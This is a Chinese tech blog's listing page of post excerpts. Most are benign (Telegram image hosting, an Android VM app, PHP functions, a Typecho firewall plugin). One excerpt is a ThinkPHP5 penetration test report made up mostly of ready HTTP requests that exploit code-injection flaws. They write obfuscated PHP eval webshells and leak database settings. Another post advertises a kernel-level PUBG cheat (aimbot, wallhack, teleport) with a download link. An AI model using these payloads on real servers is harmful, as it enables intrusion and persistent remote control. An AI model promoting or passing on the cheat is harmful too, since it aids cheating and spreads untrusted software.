推荐文章
热门文章
公告展示
最新发布
-
如何在 Telegram 网页版中实现图片上传并自动生成图床链接 如何在 Telegram 网页版中实现图片上传并自动生成图床链接 原网站地址:6v6.ren 在使用 Telegram 网页版时,你可能需要将图片上传到图床并获取链接,以便在其他地方使用。虽然 Telegram 网页版本身没有直接支持这一功能,但通过一些第三方工具和服务,你可以轻松实现这一需求。以下是几种可行的解决方案: 1. 使用基于 Cloudflare Pages 和 Telegram 的图床工具 项目地址 CloudFlare-ImgBed 功能特点 支持图片、视频、动图等多种文件格式。 支持批量上传和实时上传进度显示。 上传完成后可直接复制 Markdown、HTML 等格式的链接。 支持自定义压缩质量和身份认证。 使用方法 部署 Cloudflare Pages: 在 GitHub 上克隆CloudFlare-ImgBed项目。 配置config.json文件,填写 Telegram Bot Token 和 Channel ID。 使用 Cloudflare Pages 部署项目。 上传图片: 打开部署好的图床工具页面。 将图片拖入上传区域或点击上传按钮选择图片。 上传完成后,复制生成的 Markdown 或 HTML 链接。 2. 使用 Telegram Bot 实现图床功能 项目地址 img-mom 功能特点 支持将图片上传到 Telegram 图床或其他支持的图床服务。 返回图片链接,支持多种格式(如 Markdown、HTML)。 可通过/settings指令设置其他图床服务。 使用方法 部署 Telegram Bot: 在 GitHub 上克隆img-mom项目。 配置config.json文件,填写 Telegram Bot Token 和 Channel ID。 使用 Docker 或其他方式部署项目。 使用 Bot 上传图片: 将图片发送给机器人,机器人会返回 Telegram 图床链接。 可通过/settings指令设置其他图床服务。 3. 结合 PicGo 和图床服务 功能特点 使用 PicGo 作为图床工具,支持多种图床服务。 可以通过配置支持 Telegram 图床的插件,实现图片上传并自动生成链接。 使用方法 安装 PicGo: 下载并安装 PicGo:PicGo 官网 配置图床服务: 安装支持 Telegram 图床的插件,如telegraph-image-uploader。在 PicGo 中配置图床服务,填写 API 地址和其他必要信息。 上传图片:打开 PicGo,选择需要上传的图片。上传完成后,PicGo 会生成图片链接,你可以复制并使用。 4. 使用 Telegraph API 功能特点 Telegraph 是 Telegram 提供的一个服务,可以上传图文并生成链接。 适用于图床需求,支持图片、视频等多种文件格式。 使用方法 使用 Telegraph API 上传图片: 创建一个 Telegram Bot 并获取 API Token。 使用 Telegraph API 上传图片,获取返回的图片链接。 示例代码(Python): import requestsdef upload_image_to_telegraph(image_path, api_token): url = "https://api.telegra.ph/upload" headers = {"Authorization": f"Bearer {api_token}"} files = {"file": open(image_path, "rb")} response = requests.post(url, headers = headers, files = files) if response.status_code == 200: return response.json()[0]["src"] else : return None # 示例使用api_token = "你的Telegram Bot Token" image_path = "本地图片路径" image_link = upload_image_to_telegraph(image_path, api_token) print("图片链接:", image_link)结合 Cloudflare Workers 部署: 使用 Cloudflare Workers 编写一个简单的 API,调用 Telegraph API 上传图片。 部署完成后,通过自定义域名访问图床工具。 注意事项 文件大小限制:Telegram 对图片大小有限制(最大 5MB),部分服务可能会自动压缩图片。 部署和配置:部分方案需要一定的技术基础进行部署和配置,例如设置 Cloudflare Workers、Telegram Bot 等。
-
ThinkPHP5 代码注入漏洞总结 渗透测试报告 tp5_construct_code_exec_2 漏洞 url:http://blog.yihang.info/index.php?s=captcha 漏洞验证 请求包: POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 60 Connection: close _method=__construct&method=GET&filter[]=var_dump&get[]=dylan响应包: HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Mar 2023 05:21:43 GMT Content-Type: image/png; charset=utf-8 Content-Length: 1876 Connection: close Set-Cookie: PHPSESSID=v8cee56q175b9p0907sv4lchl4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache string(5) "dylan" string(11) "__construct" string(3) "GET" string(8) "var_dump" string(5) "dylan" NULL PNG 存在漏洞 payload1 POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 125 Connection: close _method=__construct&method=GET&filter[]=system&get[]=echo+'%3C%3Fphp+%40eval%28%24_POST%5B%22kkk%22%5D%29%3B%3F%3E'+>bak1.phppayload2 POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 125 Connection: close _method=__construct&method=GET&filter[]=system&get[]=echo+"%3C%3Fphp+%40eval%28%24_POST%5B%27kkk%27%5D%29%3B%3F%3E"+>bak1.phppayload3 POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 142 Connection: close _method=__construct&method=GET&filter[]=assert&get[]=file_put_contents('bak1.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4%3D'))写入成功 tp5_index_construct_rce 漏洞 url:http://blog.yihang.info/index.php?s=index/index/index 漏洞验证 请求包: POST /index.php?s=index/index/index HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 52 Connection: close s=xskfC&_method=__construct&method&filter[]=var_dump响应包: HTTP/1.1 500 Internal Server Error Server: nginx Date: Thu, 02 Mar 2023 05:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: PHPSESSID=08bvf36sj6d6n1n8d0jrvqp184; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 282 string(5) "xskfC" string(11) "__construct" string(0) "" string(8) "var_dump" string(5) "xskfC" string(11) "__construct" string(0) "" string(8) "var_dump" string(5) "xskfC" string(11) "__construct" string(0) "" string(8) "var_dump" 链接无效!请联系客服获取有效链接!漏洞存在 payload POST /index.php?s=index/index/index HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 186 Connection: close s=file_put_contents('bak5.php',base64_decode('PD9waHAgJGE9In4rZCgpIl4iIXsre30iO0AkYj1iYXNlNjRfZGVjb2RlKCR7JGF9WyJhIl0pO2V2YWwoIiIuJGIpOz8%2B'))&_method=__construct&method&filter[]=assert写入成功 tp5_session_include 漏洞 url:http://blog.yihang.info/index.php/index 漏洞验证 请求数据包: POST /index.php/index HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cookie: PHPSESSID=uzozteeqzqb0lxop0bi3awl9g Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 113 Connection: close _method=__construct&method=GET&filter[]=think\__include_file&get[]=/tmp/sess_uzozteeqzqb0lxop0bi3awl9g&server[]=1响应结果: think|a:5:{s:4:"test";s:0:"";s:11:"__construct";s:0:"";s:18:"think\Session::set";s:0:"";s:3:"get";s:0:"";i:1;s:0:"";}payload POST /index.php?s=captcha HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cookie: PHPSESSID=q1ces7rkvhr3gg7t9daaxkh9w Content-type: application/x-www-form-urlencoded Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 260 Connection: close _method=__construct&filter[]=think\Session::set&method=get&get[]=<?php+$a='file_put_contents';$b='base64_decode';$a($b('YmFrLnBocA=='),$b('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4='));?>&server[]=1写入成功 tp5_invoke_func_code_exec_1 漏洞 url:http://blog.yihang.info/index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1 漏洞验证 请求包: GET /index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: close响应包: phpinfo页面漏洞存在 payload GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak6.php&vars[1][]=%3C%3Fphp+%24a%3D%22%7E%2Bd%28%29%22%5E%22%21%7B%2B%7B%7D%22%3B%40%24b%3Dbase64_decode%28%24%7B%24a%7D%5B%22a%22%5D%29%3Beval%28%22%22.%24b%29%3B%3F%3E HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closetp5_dbinfo_leak 漏洞(数据库信息泄露) url:http://blog.yihang.info/index.php?s=index/think\config/get&name=database.hostname 漏洞验证 请求包: GET /?s=index/think\config/get&name=database.hostname HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: close响应包: HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Mar 2023 05:51:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 9 localhost漏洞存在 payload1 GET /?s=index/think\config/get&name=database.hostname HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload2 GET /?s=index/think\config/get&name=database.hostport HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload3 GET /?s=index/think\config/get&name=database.hostport HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload4 GET /?s=index/think\config/get&name=database.database HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: closepayload5 GET /?s=index/think\config/get&name=database.username HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Cache-Control: no-cache Pragma: no-cache Host: w1.ltfta5.site Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: close
-
在 Android 设备上免刷机 ROOT 运行任意操作系统 项目简介 Vectras-VM-Android 为用户提供一个轻量级、高效的虚拟化解决方案,利用现代 Android 设备的强大处理能力,让用户可以在 Android 设备上运行多个操作系统,包括但不限于 Linux 发行版、Windows、macOS 等。它基于 QEMU 开发,相较于 Limbo 和 Bochs,其内核更新,没有镜像大小限制,能更好地利用手机强大硬件性能,运行起来更快。 图片 核心功能 多系统支持:拥有广泛的系统兼容性,无论是经典的 Windows 系统,还是苹果的 Mac OS X,亦或是开源的 Linux,都能在安卓手机上流畅运行。 高效运行:采用了先进的虚拟化技术,能够充分利用安卓手机的硬件资源,确保虚拟操作系统运行的高效性和稳定性。即使是在配置相对普通的手机上,也能获得较为流畅的操作体验,让用户在手机上也能享受到类似电脑的操作感受。 ROM 商店:提供了 ROM 商店,用户可以下载各种系统安装,其中包括 Windows、Linux、macOS 等,使用起来很方便。 资源分配优化:智能分配 CPU、内存、存储等硬件资源,确保每个虚拟机都能获得最佳性能表现。 快照与恢复:提供快速创建和回滚快照的功能,方便用户保存特定状态并在需要时迅速恢复。 小窗口分屏模式:当用户退出主屏幕或切换到其他应用时,虚拟系统内的游戏和应用仍能在小窗口中继续运行,不影响当前操作。 无缝多任务处理:支持同时打开多个应用,并在不同任务间自由切换,提升工作效率和娱乐体验。 锁屏托管:即使手机处于锁屏状态,虚拟系统中的任务也能继续执行,如接收消息通知、后台下载等,确保重要信息不会遗漏。 项目地址 隐藏内容,请前往内页查看详情 图片 简单的使用教程 首次下载安装打开,会需要进行初始化,这里选择Auto setup即可,该阶段需要你拥有一个良好的网络环境: 图片 初始化完成会自动进入到首页: 图片 这里我们可以在 ROM 商店中查找需要运行的系统,只不过目前只能下载到 Windows 和 Linux 的系统,至于 MacOS 的我没找到在哪里添加: 图片 选中我们要创建的虚拟机,例如我这里选择的是Windows XP,然后点击继续会询问你是否去下载系统镜像或者导入本机已有的,我们需要现在下载: 图片 下载完成后,再次点击继续选择Select that file now来选择下载的cvbi文件,根据提示进行导入点击ADD即可: 图片 在首页中,点击虚拟机就可以启动对应的虚拟机: 图片 目前我尝试去运行 Linux 和 MacOS 感兴趣的朋友可以自己去尝试一下。 注意 部分设备在 Android 14+ 上不支持使用此服务: oppo Realme 华为 荣耀 vivo 但是以下设备是支持使用的: 三星 谷歌 小米澎湃 OS 红魔 官方虽然称可以在以上设备中使用,但是无法保证它的稳定性,大家可以去尝试一下。
-
提升 PHP 编码效率的 10 个实用函数 PHP开发者始终追求更简洁、高效的代码。幸运的是,PHP 提供了丰富的内置函数,能显著减少手动编码,提升开发效率。无论经验深浅,掌握这些函数的使用技巧都至关重要。 图片 以下列出了 10 个可以显著加快您的编码过程的 PHP 函数: 1、array_map() array_map() 当需要对数组每个元素执行相同操作时,它是首选函数,能避免编写重复循环。 $numbers = [ 1 , 2 , 3 , 4 ]; $squared = array_map (fn( $num ) => $num * $num , $numbers ); print_r ( $squared ); // 输出:[1, 4, 9, 16]2、array_filter() array_filter() 使用自定义条件过滤数组元素,简化数据处理。 $numbers = [ 1 , 2 , 3 , 4 , 5 ]; $evenNumbers = array_filter ( $numbers , fn( $num ) => $num % 2 === 0 ); print_r ( $evenNumbers ); // 输出:[2, 4]3、array_reduce() array_reduce() 将数组缩减为单个值,例如计算数组元素总和。 $numbers = [ 1 , 2 , 3 , 4 ]; $sum = array_reduce ( $numbers , fn( $carry , $item ) => $carry + $item , 0 ); echo $sum ; // 输出:104、json_encode() 和 json_decode() json_encode() 和 json_decode() 简化 JSON 数据处理,实现快速编码和解码。 $data = [ 'name' => 'Roki' , 'age' => 25 ]; $json = json_encode ( $data ); echo $json ; // 输出:{"name":"Roki","age":25} $array = json_decode ( $json , true ); print_r ( $array ); // 输出:['name' => 'Roki', 'age' => 25]5、str_contains() str_contains() PHP 8 中新增,用于检查字符串是否包含特定子字符串。 $haystack = "我喜欢 PHP!" ; if ( str_contains ( $haystack , "PHP" )) { echo "PHP is present!" ; // 输出:PHP is present! }6、str_starts_with() 和 str_ends_with() str_starts_with() 和 str_ends_with() PHP 8 新增,用于快速判断字符串是否以特定子字符串开头或结尾。 if ( str_starts_with ( "hello world" , "hello" )) { echo "以 'hello' 开头!" ; // 输出:以 'hello' 开头! } if ( str_ends_with ( "hello world" , "world" )) { echo "以 'world' 结尾!" ; // 输出:以 'world' 结尾! }7、explode() 和 implode() explode() 和 implode() 简化字符串的拆分和连接操作。 // 拆分字符串 $string = "PHP,JavaScript,Python" ; $languages = explode ( "," , $string ); print_r ( $languages ); // 输出:['PHP', 'JavaScript', 'Python'] // 连接数组 $newString = implode ( " | " , $languages ); echo $newString ; // 输出:PHP | JavaScript | Python8、array_merge() array_merge() 轻松合并两个或多个数组。 $array1 = [ 'a' , 'b' ]; $array2 = [ 'c' , 'd' ]; $result = array_merge ( $array1 , $array2 ); print_r ( $result ); // 输出:['a', 'b', 'c', 'd']9、in_array() in_array() 轻松检查数组中是否存在特定值。 $fruits = [ 'apple' , 'banana' , 'cherry' ]; if ( in_array ( 'banana' , $fruits )) { echo "Banana is in the list!" ; // 输出:Banana is in the list! }10、array_unique() array_unique() 从数组中删除重复值。 $numbers = [ 1 , 2 , 2 , 3 , 4 , 4 , 5 ]; $uniqueNumbers = array_unique ( $numbers ); print_r ( $uniqueNumbers ); // 输出:[1, 2, 3, 4, 5]结论 掌握这些 PHP 函数不仅能让你的代码更简洁,还能提高你的整体开发速度。将它们集成到你的工作流程中,看看你能节省多少时间。
-
抖音采集下载工具 TikTokDownloader TikTokDownloader 是一个开源项目,功能强大的抖音数据采集工具。它支持多种功能,包括下载无水印视频、图集,采集抖音详细数据,以及获取直播推流地址等。 功能介绍 下载无水印视频/图集:轻松获取高清无水印内容。 批量下载作品:支持批量下载抖音账号发布的视频、喜欢的视频、收藏的作品。 采集详细数据:获取抖音视频的详细数据,方便分析和研究。 自动跳过已下载文件:避免重复下载,节省时间和空间。 持久化保存数据:采集的数据可以持久保存,方便后续查看。 下载封面图:支持下载动态和静态封面图。 获取直播推流地址:可以获取抖音直播的推流地址,方便观看。 Web UI 交互界面:简单易用,双击main.exe即可打开程序,按提示操作即可。 工具预览图 图片 图片 下载地址 隐藏内容,请前往内页查看详情 使用说明 配置 Cookie:使用前需要先配置 Cookie,具体操作请参考离线文档。 操作步骤:双击main.exe打开程序,按提示操作即可进入 Web UI 交互模式。
-
2025年蛇年大吉新年创意图模板PSD设计CDR素材 2025 年蛇年大吉新年创意图模板 PSD 设计 CDR 素材 新年到,蛇年大吉!为了让设计爱好者和创意工作者更好地迎接新年,今天为大家分享一套 2025 年蛇年新年创意图模板。这套素材包含 PSD 和 CDR 格式,适合各种设计需求,即使是设计新手也能轻松上手,快速制作出精美的新年海报、贺卡等。 素材亮点 多种格式:提供 PSD 和 CDR 格式,满足不同设计软件的使用需求。 创意元素:丰富的蛇年元素,让设计更具新年氛围。 易于上手:即使是设计新手,也能快速掌握,轻松制作出专业感十足的作品。 素材预览图 图片 下载地址 隐藏内容,请前往内页查看详情
-
PUBG内核透视追踪广角载具车加速稳定内核(3.60版本) 功能介绍 PUBG 3.60版本的内核透视追踪广角载具加速稳定内核,功能强大,一次购买永久使用,提升游戏体验。 永久使用 PUBG 玩家们,想要在游戏中获得更好的体验?今天为大家介绍一款 PUBG 的辅助工具——3.60 版本的内核透视追踪广角载具加速稳定内核。这款工具功能强大,一次购买,永久使用! 绘制功能 血量、方框、射线、距离、骨骼、人数、名称、载具、追踪射线、雷达、类名 清晰显示敌人信息,帮助你更好地掌握战场动态。 追踪功能 子弹追踪、掩体漏打、自动开火、360° 追踪 支持算法和函数自定义,可设置追踪距离和追踪概率,让你轻松锁定目标。 人物相关 广角、定点、加速、跳跃、死亡叫 提升人物操作灵活性,加速跳跃轻松上房,广角视野更开阔。 坐标相关 热气球、电梯、锁定地形、坐标传送 快速定位和传送,让你在游戏中更加便捷。 载具相关 载具控制、载具穿墙、自定义载具重力、速度、左右翻滚、前后翻滚 提升载具性能,无论是越野还是漂移,都能轻松应对。 下载地址 PUBG内核 下载地址:https://pan.baidu.com/s/1ATRfcfgBgdL71ovVDYHWQg?pwd=5x74 提取码:5x74 工具介绍图 图片
-
Typecho 防火墙插件 WebFirewall:主动防御,守护您的网站安全 简介 与其亡羊补牢,不如主动防御!许多用户建议我们开发木马扫描和清理功能,但我们相信更有效的策略是预防网站被挂马。为此,我们开发了《Typecho 防火墙插件 WebFirewall》,一款基于 Typecho 的应用层防火墙,能够有效阻止大部分渗透攻击,并提供高度灵活的自定义规则功能,为您的网站构筑坚实的安全防线。目前,易航博客官网和官方论坛已率先使用该插件,并取得了良好的效果。 图片 适用场景 WebFirewall 能够有效应对各种网站安全威胁,例如: 抵御各类攻击: 有效防御 CC 攻击、部分流量攻击、SQL 注入、XSS/XSRF 等渗透攻击,以及恶意上传脚本和 webshell 等危险行为。 灵活的访问控制: 支持基于 IP 地址、UA (用户代理) 的黑白名单管理,精准控制网站访问权限,屏蔽特定地区或特定用户的访问。 精细化的规则自定义: 提供可视化界面,方便您自定义和管理防御规则,实时查看防火墙拦截状态,并分析攻击来源、被攻击 URI 和受保护目录。 满足多种需求: 轻松屏蔽恶意蜘蛛、扫描器,以及包含敏感词的内容,无需复杂的设置。 适用范围广泛: 适用于所有动态网站。 插件功能 1.遭受CC攻击、部分流量攻击的用户 2.遭受SQL注入、XSS/XSRF之类的渗透攻击的用 3.遭受恶意上传脚本、webshell等危险行为的用户 4.希望屏蔽境内或境外地区访问自己网站的用户 5.希望通过UA、IP黑白名单管理网站访问规则的用户 6.希望可视化管理网站防御规则的用户 7.希望实时展示防火墙拦截状态的用户 8.适合想要查看攻击来源、被攻击的URI、保护的目录,但又不会看的用户 9.适合网站不需要某些蜘蛛来访,但又不会禁止的用户 10.适合网站被扫描器恶意扫描,但又不会禁止的用户 11.适合网站发文章不想要某些敏感词出现,但又不会设置的用户 12.应用场景包含所有动态网站 URL白名单 设置后,只要是关于添加的URL请求,都是进行URL白名单过滤,白名单设置后该URL将会失去大部分防御规则。 注意格式:例如误拦截的url如下: /index/index/aaa.php?id=eradasa&adas,添加URL白名单的需求是,操作如下:^/index/index/aaa.php,只需要添加 ^/index/index/aaa.php 到URL白名单即可。 环境要求 PHP 7.4+ Typecho 1.2+ 快速预览 Typecho 防火墙插件 WebFirewall 插件设置图片 Typecho 防火墙插件 WebFirewall 拦截日志图片 Typecho 防火墙插件 WebFirewall 详细拦截日志图片 源码下载 Typecho 防火墙插件 WebFirewall 下载地址:https://wwdd.lanzouw.com/iMcNv2m3fyah 提取码: